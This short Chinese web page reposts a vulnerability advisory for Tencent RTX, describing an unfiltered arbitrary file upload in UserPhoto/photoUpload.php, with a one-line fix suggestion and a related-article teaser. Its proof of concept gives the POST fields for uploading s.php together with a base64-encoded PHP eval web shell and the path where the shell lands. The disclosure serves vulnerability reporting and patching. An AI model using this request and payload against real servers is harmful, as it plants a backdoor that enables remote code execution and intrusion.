安装RTX后打开IP:8012网址
腾讯RTX上传任意文件及修复
转载腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞
详细说明:
简单的一个post表单即可上传
$user_account = $_POST['user_account'];
$file_name = $_POST["file_name"];
$file_data = $_POST["file_data"];
无任何过滤
漏洞证明:
user_account=1000
file_name=s.php
file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+
file_data为base64_encode数据
post提交后UserPhoto目录下生成PhotoFiles/s.php
需要extension=php_mbstring.dll开启及php4
修复方案:
上传过滤
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
jQuery图片剪切任意文件上传
实习的公司一直不给web相关项目做,手痒痒,生怕把web方面的知识给遗漏了,有空没空就翻翻之前做的一些项目,把一些功能拿出来记录一下,以便以后遇到方便查询。 在一些项目中会经常遇到 需要批量上传图片的需求,光光图片给传了还不够,还要给图片描述啊 啥的,不过在.NET中如果用控件来
jQuery图片剪切任意文件上传 json javascript ViewUI html